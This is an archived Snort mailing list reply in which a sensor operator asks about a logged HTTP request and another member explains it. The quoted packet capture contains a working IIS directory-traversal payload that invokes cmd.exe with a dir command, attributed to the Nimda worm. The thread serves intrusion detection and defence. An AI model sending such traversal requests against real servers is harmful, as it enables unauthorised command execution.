Snort mailing list archives
Re: what does this mean
From: Ryan Russell <ryan () securityfocus com>
Date: Fri, 5 Apr 2002 14:57:11 -0700 (MST)
On Fri, 5 Apr 2002, Omolayo Salako wrote:
i am getting a lot of this on one of my sensors, does this mean someone is trying to do directory listing on my web server 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74 2F 73 %35%63../winnt/s 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F ystem32/cmd.exe? 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D /c+dir HTTP/1.0 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www.Conn 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close. 0D 0A
Generally, yes. If the attacker gets back a directory listing, then they know your server is vulnerable. In particular, this attack is most frequently performed by the Nimda worm, as part of its spreading mechanism. Ryan _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- what does this mean Omolayo Salako (Apr 05)
- Re: what does this mean krista l merrill (Apr 05)
- Re: what does this mean Ryan Russell (Apr 05)
- Re: what does this mean Onie Camara (Apr 05)
- <Possible follow-ups>
- RE: what does this mean McCammon, Keith (Apr 05)
- RE: what does this mean Andrew Blevins (Apr 05)